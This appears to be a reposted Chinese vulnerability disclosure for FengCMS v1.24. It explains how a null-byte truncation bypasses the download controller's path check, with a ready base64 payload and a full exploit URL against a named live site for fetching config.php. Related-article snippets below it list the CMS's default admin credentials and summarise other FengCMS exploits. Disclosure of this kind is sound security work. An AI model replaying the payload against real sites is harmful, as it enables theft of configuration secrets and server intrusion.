php下载源文件绕开下载地址,Fengcms 最新版v1.24任意文件下载(绕过过滤)

最新推荐文章于 2022-05-30 15:44:19 发布
最新推荐文章于 2022-05-30 15:44:19 发布
阅读量221 收藏
点赞数
文章标签: php下载源文件绕开下载地址
"本文详细分析了一个FengCMS的安全漏洞,该漏洞允许攻击者通过base64_decode和截断技巧绕过下载限制,下载服务器上的config.php等敏感文件。作者指出,问题根源在于root_path设置为网站根目录,而非/upload。通过创建一个利用此漏洞的测试用例,证明了在特定PHP版本下(低于5.3.4)可以成功下载config.php。"
摘要由CSDN通过智能技术生成

### 简要描述:

之前fengcms修复了好几次这个问题,但依旧知识不对。不过到我这个应该就终结了,我会给出好的解决方案。这也不是厂商的问题,如果不是专门搞安全的人也很难考虑到这一点。

多说一句,fengcms送的礼物已经收到了,再次感谢!这种厂商要奖励,很负责!!

官方给出的测试站已经升到最新版了,我这里测试通过,已经可以下载config.php。

### 详细说明:

/app/controller/downController.php:

```

class downController extends Controller{

public function index(){

$_GET['file']=base64_decode($_GET['file']);

$_GET['file']=str_replace("..","",$_GET['file']);

$exp=explode("/",$_GET['file']);

if($exp[1]=="upload"){

if(file_exists(ROOT_PATH.$_GET['file'])){

header("Content-Type: application/force-download");

header("Content-Disposition: attachment; filename=".basename($_GET['file']));

readfile(ROOT_PATH.$_GET['file']);

}else{

echo '';

}

}else{

echo '';

}

}

}

```

看他是怎么处理的:

1.base64_decode解码

2.过滤..为空

3.将$_GET['file']用/分割成$exp,并取第二个($exp[1]),判断$exp[1]是否等于upload,等于才允许下载

4.将root_path和$_GET['file']组合成绝对路径,下载文件

如何绕过过滤,答案是\0截断。

首先,不管有没有全局addslashes或GPC,base64_decode就能无视之,引入一个\0,进行截断。

因为代码里取得是$exp[1]判断是否是"upload",所以我们可以把要下载的文件内容写在$exp[0]里,之后用\0截断掉,readfile的时候就能够把我要的config.php下载下来了。

所以罪魁祸首还是root_path是网站根目录,如果root_path是/upload目录的话,我想要下载config.php的话就必须要用../跳转到上层目录。

使用%00截断的条件是php版本小于5.3.4(左右吧,记不得),而官方给的测试站正好是5.2.x,所以可以通过测试,下载config.php。

### 漏洞证明:

首先测试一下之前的https://images.seebug.org/upload/../config.php还能不能下载:

[01.jpg](https://images.seebug.org/upload/201407/16203849bac0a0083ee11ff42c0b0caeab83bfa3.jpg)

果断不能了。。。

那么将file改成这样:

```

echo base64_encode("\\config.php\x00/upload");

```

也就是:

http://guf521656.h163.92hezu.org/?controller=down&file=XGNvbmZpZy5waHAAL3VwbG9hZA

访问发现可以继续文件下载:

[02.jpg](https://images.seebug.org/upload/201407/162039520744c06725507d6f48f3a80294031ada.jpg)

这是下载到的config.php:

[03.jpg](https://images.seebug.org/upload/201407/16204033180c0fe9cf7953455cf688e6c4fdb634.jpg)

loading-bars.svg

灰熊问题最优解
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FengCms 网站内容管理系统 v1.28 Beta
04-04
FengCms Beta 1.28 更新说明: 本次更新给栏目增加了图片字段,以后可以给每个栏目单独指定一张栏目图片,便于大家更加灵活的制作网站。 另,前段时间由于爆发了N多的安全漏洞,为了更加安全,我们给全站增加了XSS过滤,导致后台一些功能受到限制,甚至出错。 为了解决这个问题,我们在1.28版本中,去掉了全站过滤,而仅仅保留了前台过滤。这样大家在使用时会更加灵活方便。 1、栏目表新增图片字段 2、去除了后台的XSS过滤。 虽然FengCms是一款免费、开源、且就FengCms本身是不寻求商业模式的这样一套自由的CMS系统。但是出于对乌云上这些朋友给予我们的热心帮助,开发团队决定采购一批小礼品。随后将邮寄给大家! 希望各位白帽子可以继续为FengCms挖掘漏洞。我相信,我们一定可以做得更好! 另外FengCms2.0 公开版本将推迟发布。我们从1.0被挖掘出来的漏洞和问题,我们将进一步的去完善2.0。不定期的会在FengCms交流群中发布内测版本。希望大家可以关注QQ群 ,群号是53667986! ============== FengCms 安全说明 ============================= 1、修改后台密码。在后台右上角点击“修改密码”进行修改。 2、修改后台认证码。在 /config.php 配置文件中修改。 3、修改后台路径。直接修改 admin 目录名即可。 4、随时关注官方网站 www.fengcms.com 以获得最新的升级补丁。 ============== Linux 权限配置777 ============================ PS:安装在linux服务器下要注意给以下目录文件夹和其下的子文件777权限。 /admin/app/dbbackup 数据库备份目录 /admin/app/cache 后台缓存文件 /app/cache 前台缓存文件 /template 模版目录 /css 样式目录 /upload/ 上传目录 /config.php 配置文件 更多目录信息,请查阅目录说明.txt文件 =============== 新L标签写法 ================================= 老的万能标签写法: {loop M("module")->l("article"…… 新的万能标签写法: {loop l("article"…… 也就是说,省略调了“ M("module")-> ” 原先写的模版没有必要修改,因为兼容老的写法。 ============================================================= 后台地址:/admin/login.php 用户名:admin 密码:123456 认证码:8888 ======================== FengCms系统是由地方网络工作室倾力打造的一套PHP+MYSQL的CMS,和其他小型CMS不同,我们的CMS是完全自主开发的核心(由开源核心开发的CMS程序很大程度上受到核心的限制,在安全问题,以及代码臃肿等方面有先天缺陷)。当然,由于我们是自主开发的核心,因此,我们和其他cms有很大的不同。 由此,FengCms官方制作了视频教程和模版标签白皮书,方便诸君能够迅速理解并使用FengCms网站内容管理系统。 当然,这还远远不够。因此我们会倍加努力,写更多的教程,不断的完善我们的程序,以期为诸君提供更加优质的服务! FengCms是一套纯粹为展示内容而生的cms系统。因此,FengCms不包含任何交互模块(除自带的留言,且默认不显示)。我们是为纯粹为展示内容而生的,是纯展示类型网站的最佳伴侣。 FengCms自带非常强大的模型系统,利用模型系统,可以自由搭建任意需要的模型。不再收到任何限制。甚至,你新建的模型可以连栏目都没有,你爱咋滴咋滴。 FengCms的万能L标签功能,可以对数据库内的任意数据表进行任意调用,支持原生PHP函数,支持循环套循环,判断套判断。 更为强大的是。FengCms的后台,其实和前台一样,是用一样的代码写出来的。因此,FengCms有无与伦比的二次开发潜力。其中的好处,需要诸君慢慢品评! FengCms系统可以用来制作企业网站,文章网站,图片网站,电影网站,导航站等等等等不需要交互系统的各种类型的网站。 FengCms 开发团队石峰在开发一套大的项目,总监刘峰目前就职于青海某旅游公司。因此,FengCms 项目进展有所放缓。但是,FengCms团队始终对FengCms不离不弃。我们一定会坚持开发下去的。请大家放心。 如果使用新增的下载函数不能下载,而是打开一个乱码的网
FengCms 网站内容管理系统 v1.32 Beta.zip
07-06
FengCms Beta 1.32 更新说明: 1、新增阿里云xss安全插件,提升FengCMS系统安全 2、核心增加过滤,提升系统安全。 3、新增动态缩略图函数。可根据大图动态生成缩略图于内存中,可大幅减少流量占用,提高网站打开速度(但会占用CPU资源,劣质虚拟主机慎用)。 函数使用方法 {thumb(原始图片地址,缩略图宽度,缩略图高度)} 示例:{thumb($v['img'],120,80)} 4、新增 web.config 文件,用于 windows 2008 以及以上系统的伪静态配置(需要服务器支持)我们建议系统运行于linux服务器上。 FengCms系统介绍 FengCms系统是由地方网络工作室倾力打造的一套PHP MYSQL的CMS,和其他小型CMS不同,我们的CMS是完全自主开发的核心(由开源核心开发的CMS程序很大程度上受到核心的限制,在安全问题,以及代码臃肿等方面有先天缺陷)。当然,由于我们是自主开发的核心,因此,我们和其他cms有很大的不同。 由此,FengCms官方制作了视频教程和模版标签白皮书,方便诸君能够迅速理解并使用FengCms网站内容管理系统。 当然,这还远远不够。因此我们会倍加努力,写更多的教程,不断的完善我们的程序,以期为诸君提供更加优质的服务! FengCms是一套纯粹为展示内容而生的cms系统。因此,FengCms不包含任何交互模块(除自带的留言,且默认不显示)。我们是为纯粹为展示内容而生的,是纯展示类型网站的最佳伴侣。 FengCms自带非常强大的模型系统,利用模型系统,可以自由搭建任意需要的模型。不再收到任何限制。甚至,你新建的模型可以连栏目都没有,你爱咋滴咋滴。 FengCms的万能L标签功能,可以对数据库内的任意数据表进行任意调用,支持原生PHP函数,支持循环套循环,判断套判断。 更为强大的是。FengCms的后台,其实和前台一样,是用一样的代码写出来的。因此,FengCms有无与伦比的二次开发潜力。其中的好处,需要诸君慢慢品评! FengCms系统可以用来制作企业网站,文章网站,图片网站,电影网站,导航站等等等等不需要交互系统的各种类型的网站。 FengCms 开发团队石峰在开发一套大的项目,总监刘峰目前就职于青海某旅游公司。因此,FengCms 项目进展有所放缓。但是,FengCms团队始终对FengCms不离不弃。我们一定会坚持开发下去的。请大家放心。 如果使用新增的下载函数不能下载,而是打开一个乱码的网页,则请检查php.ini配置文件中的 output_buffering 选项是否在 Off ,请改成 On 或者 4096 FengCms 安全说明 1、修改后台密码。在后台右上角点击“修改密码”进行修改。 2、修改后台认证码。在 /config.php 配置文件中修改。 3、修改后台路径。直接修改 admin 目录名即可。 Linux 权限配置777 PS:安装在linux服务器下要注意给以下目录文件夹和其下的子文件777权限。 /admin/app/dbbackup 数据库备份目录 /admin/app/cache 后台缓存文件 /app/cache 前台缓存文件 /template 模版目录 /css 样式目录 /upload/ 上传目录 /config.php 配置文件 新L标签写法 老的万能标签写法: {loop M("module")->l("article"…… 新的万能标签写法: {loop l("article"…… 也就是说,省略调了“ M("module")-> ” 原先写的模版没有必要修改,因为兼容老的写法。 FengCms前台页面: FengCms后台管理:  后台地址:/admin/login.php 用户名:admin 密码:123456 认证码:8888  后台页面:   相关阅读 同类推荐:CMS系统
clean后class文件全部丢失_原创 | 记一次任意文件下载绕过过程
weixin_39768917的博客
11-26 149
点击上方“蓝字”关注我们吧!挖掘过程一般来说,在文件下载/查看功能处,当文件名参数可控,且系统未对参数进行过滤或者过滤不全时,就可以实现下载服务器上的任何文件,产生任意文件下载漏洞。一般可以通过相关的业务关键字(例如download、filename等)或者相关的操作类(例如InputStream、File等)快速定位相关的模块进行审计挖掘。前段时间审计某项目时发现一处任意文件下载绕过...
fengcms v1.32 beta
10-23
FengCms——由地方网络工作室基于PHP+MYSQL开发。是一款开源的网站内容管理系统。系统支持自由订制模型,你完全可以用FengCms打造一个你想要的任意展示模型。模版和程序分离、自由标签系统,让FengCms灵活无比。拥有FengCms,你可以完成国内95%的网站制作需要! 经过一年多的准备工作以及半年的紧张开发,FengCms终于拨开红纱,正式面世了。初次出阁,颇为娇羞,请各位朋友爱怜轻拍!FengCms不含会员系统,评论系统(用新浪微博评论墙和腾讯微博评论墙代替),没有商城系统等等。FengCms是一款纯粹为展示内容而生的cms系统。FengCms含有灵活多变的模块系统,你可以自定义出来任意你想要的模型(有点小吹,由于是第一个版本,所以还有所欠缺,不过我们会努力的。)FengCms系统可以用来制作企业网站,文章网站,图片网站,电影网站,导航站等等等等不需要交互系统的各种类型的网站。FengCms系统建好网站之后,网站的管理极其便利,会让任何编辑爱上我们的cms系统的!细节之处,提现用心! 系统安装路径:/install/index.php后台路径:/admin/login.
FengCms内容管理系统 1.32.rar
05-25
FengCms由地方网络工作室基于PHP MYSQL开发。是一款开源的网站内容管理系统。系统支持自由订制模型,你完全可以用FengCms打造一个你想要的任意展示模型。模版和程序分离、自由标签系统,让FengCms灵活无比。拥有FengCms,你可以完成国内95%的网站制作需要! FengCms内容管理系统 1.32 更新日志:2015-10-12 1、新增阿里云xss安全插件,提升FengCMS系统安全2、核心增加过滤,提升系统安全。3、新增动态缩略图函数。可根据大图动态生成缩略图于内存中,可大幅减少流量占用,提高网站打开速度(但会占用CPU资源,劣质虚拟主机慎用)。函数使用方法 {thumb(原始图片地址,缩略图宽度,缩略图高度)}4、新增 web.config 文件,用于 windows 2008 以及以上系统的伪静态配置(需要服务器支持)我们建议系统运行于linux服务器上。 特色: 模型极度灵活 自由搭建任意模型,万能AJAX验证,胜任任何变态需要! 稳定压倒一切 基于PHP MYSQL构建,稳定坚若磐石! 易用无与伦比 每一处细节,都倍感贴心,让编辑从此不再厌恶后台! 速度超越极限 每一处细节,都倍感贴心,让编辑从此不再厌恶后台!
最新精美后台管理系统模版html源文件+PSD源文件下载 uimaker
03-20
2016-9-1 更新 【仅更新了蓝色版,橙色的可自行替换】 1、增加右侧TAB页切换功能 2、增加顶部和左侧隐藏功能 3、修改制作了模板中的弹窗组件 2015-5-4 更新 1、新增橙黄风格皮肤一套 2014-12-22 更新 1、增加单...
JD-GUI v0.2.8的class文件反编译工具下载.txt
07-17
jd-gui提供图形化界面打开java编译的.class后缀文件,将它反编译成java源文件信息,如下图所示
20个Flash源文件下载. flash源文件下载。swf源文件,swf下载
12-29
20个Flash源文件下载. flash源文件下载。swf文件下载 全部属于个人作品,仅供学习,参考 20个Flash源文件下载. flash源文件下载。swf文件下载 全部属于个人作品,仅供学习,参考
百度文库免积分下载,文库源文件下载V2.0
02-27
安装步骤: 1、下载软件后直接运行或在官网下载...2、解压软件,运行exe文件,切记不要删除文件夹或data文件,都是存储数据的,删后就不能用了 3、打开软件,输入需要下载的百度文库地址,点击下载按钮即可完成下载
文件下载工具类-可选删除源文件
03-11
文件下载工具类-可选删除源文件
.hpp文件_文件上传漏洞另类绕过技巧及挖掘案例全汇总
weixin_39763640的博客
11-22 679
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识: 要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1) 报文特点: 观察文...
PHP代码审计——系统重装漏洞(fengcms
W小哥
08-07 1128
一、漏洞描述 在CMS安装过程中,由于配置文件过滤不严,导致在安装过程中可以插入配置文件恶意代码,从而执行任意命令,甚至直接获取Webshell 二、代码审计 查看安装
php之系统重装漏洞fengcms
qq_42307546的博客
05-30 359
项目地址 https://www.phpfans.net/xz/108401.html 一些php编写的网站在安装完成之后会在install目录下生成一个类似于install.lock文件来判断网站是否已经安装过了防止再次安装,但是由于逻辑上的问题只是判断了文件是否存在并没有退出导致了重装而且有的时候在安装过程中会把一些配置文件的信息通过post方式传输并保存在配置文件中如果没有对这些信息进行过滤我们就可以把恶意代码插进去 看一下安装的代码 install/index.php define("TPL_IN
[代码审计] fengcms1.32从详细漏洞分析到漏洞利用
PANDA墨森的博客
12-20 631
##前言 这是我在此发表的第一篇代码审计的文章,仅供学习参考!首发于哈拉少安全小队微信公众号 一、Cms初识: FengCms——由地方网络工作室基于PHP+MYSQL开发。是一款开源的网站内容管理系统。系统支持自由订制模型,你完全可以用FengCms打造一个你想要的任意展示模型。模版和程序分离、自由标签系统,让FengCms灵活无比。拥有FengCms,你可以完成国内95%的网站制作需要! -目录结构: 二、漏洞描述: 在fengcms的安装程序中,由于安装...
文件包含漏洞
jpygx123的博客
10-25 4050
文件包含漏洞 严格来说,文件包含漏洞是“代码注入”的一种,这种攻击其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。 常见的导致文件包含(文件读取)的函数如下: PHP: include():使用此函数,只有代码执行到此函数时才将文件包含进来,发生错误时只警告并继续执行。 require():使用此函数,只要程序执行,立即调用此函数包含文件,发生错误时,会输出错误信息并立即终...
网络安全之文件包含漏洞总结
kali_Ma的博客
03-10 2313
介绍 文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。 但我们除了包含常规的代码文件外,包含的任意后缀文件都会被当作代码执行,因此,如果有允许用户控制包含文件路径的点,那么则很有可能包含非预期文件,从而执行非预期的代码导致getshell。 几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,在JSP、ASP中十分少甚至没有,
文件包含(CTF)
热门推荐
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
php 下载文件 ob_end_clean,PHP下载文件的方式
weixin_35242442的博客
03-10 365
PHP下载文件的方式1. 得到文件路径从$_GET['file']得到文件路径$path_parts = pathinfo($_GET['file']);$file_name = $path_parts['basename'];$file_path = '/mysecretpath/' . $file_name;务必使用上面这种方法得到路径,不能简单的字符串拼接得到路径$mypath = '/...
文件包含漏洞学习笔记
abtgu的博客
04-10 448
文章目录什么是文件包含漏洞文件包含函数文件包含漏洞的利用方式---伪协议文件包含漏洞的利用方式---其他文件包含漏洞的防御 什么是文件包含漏洞 什么是文件包含? 为了更好地使用代码的 重用性 ,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 文件包含分为本地文件包含和远程文件包含。 文件包含漏洞的成因是什么? 在包含文件时,为了灵活包含文件,将被包含文件设置为变...
OAF 客户化开发实例:FTP 服务器文件下载开发实例详解
FTP服务器文件下载开发实例 本文档所描述的是一个基于OAF(Oracle Application Framework)的客户化开发实例,具体来说是实现FTP服务器文件下载的开发实例。下面将对该实例进行详细的解释和分析。 **概述** FTP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值